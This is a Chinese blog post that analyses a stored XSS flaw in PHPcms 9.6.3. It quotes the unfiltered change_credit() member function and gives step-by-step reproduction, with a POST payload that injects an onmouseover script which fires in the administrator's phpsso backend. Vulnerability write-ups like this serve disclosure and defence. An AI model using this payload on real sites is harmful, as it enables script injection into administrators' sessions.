PHPcms9.6.3存储型XSS(poc优化版)

 

  漏洞分析

  文件路径: /phpcms/modules/member/index.php

    public function change_credit() {
        $memberinfo = $this->memberinfo;
        //加载用户模块配置
        $member_setting = getcache('member_setting');
        $this->_init_phpsso();
        $setting = $this->client->ps_getcreditlist();
        $outcredit = unserialize($setting);
        $setting = $this->client->ps_getapplist();
        $applist = unserialize($setting);
        
        if(isset($_POST['dosubmit'])) {
            //本系统积分兑换数
            $fromvalue = intval($_POST['fromvalue']);
            //本系统积分类型
            $from = $_POST['from'];
            $toappid_to = explode('_', $_POST['to']);
            //目标系统appid
            $toappid = $toappid_to[0];
            //目标系统积分类型
            $to = $toappid_to[1];
            if($from == 1) {
                if($memberinfo['point'] < $fromvalue) {
                    showmessage(L('need_more_point'), HTTP_REFERER);
                }
            } elseif($from == 2) {
                if($memberinfo['amount'] < $fromvalue) {
                    showmessage(L('need_more_amount'), HTTP_REFERER);
                }
            } else {
                showmessage(L('credit_setting_error'), HTTP_REFERER);
            }

            $status = $this->client->ps_changecredit($memberinfo['phpssouid'], $from, $toappid, $to, $fromvalue);
            if($status == 1) {
                if($from == 1) {
                    $this->db->update(array('point'=>"-=$fromvalue"), array('userid'=>$memberinfo['userid']));
                } elseif($from == 2) {
                    $this->db->update(array('amount'=>"-=$fromvalue"), array('userid'=>$memberinfo['userid']));
                }
                showmessage(L('operation_success'), HTTP_REFERER);
            } else {
                showmessage(L('operation_failure'), HTTP_REFERER);
            }
        } elseif(isset($_POST['buy'])) {
            if(!is_numeric($_POST['money']) || $_POST['money'] < 0) {
                showmessage(L('money_error'), HTTP_REFERER);
            } else {
                $money = intval($_POST['money']);
            }
            
            if($memberinfo['amount'] < $money) {
                showmessage(L('short_of_money'), HTTP_REFERER);
            }
            //此处比率读取用户配置
            $point = $money*$member_setting['rmb_point_rate'];
            $this->db->update(array('point'=>"+=$point"), array('userid'=>$memberinfo['userid']));
            //加入消费记录,同时扣除金钱
            pc_base::load_app_class('spend','pay',0);
            spend::amount($money, L('buy_point'), $memberinfo['userid'], $memberinfo['username']);
            showmessage(L('operation_success'), HTTP_REFERER);
        } else {
            $credit_list = pc_base::load_config('credit');
            
            include template('member', 'change_credit');
        }
    }

  没有过滤  $toappid_to = explode('_', $_POST['to']);

  没有对用户提交的数据做过滤导致xss漏洞

  漏洞复现:

 

  首先注册用户

  注册完毕登陆

  打开页面  http://localhost/index.php?m=member&c=index&a=change_credit&

  post数据为:

dosubmit=1&fromvalue=0.6&from=1&id=1&to=}" onmouseover=alert(1)><img width=0 height=0 

  

 

  管理员打开后台:phpsso--》 phpsso管理--》通信信息 ,鼠标移到查看,及户籍触发指定js代码

 

 

  说鸡肋也不鸡肋,说好用也没有感觉很好用, 难受

  参考地址:https://xz.aliyun.com/t/1860

作者: NONO
出处:http://www.cnblogs.com/diligenceday/
企业网站:http://www.idrwl.com/
开源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830 

posted @ 2020-03-07 00:20  方方和圆圆  阅读(813)  评论(0编辑  收藏  举报

再过一百年, 我会在哪里?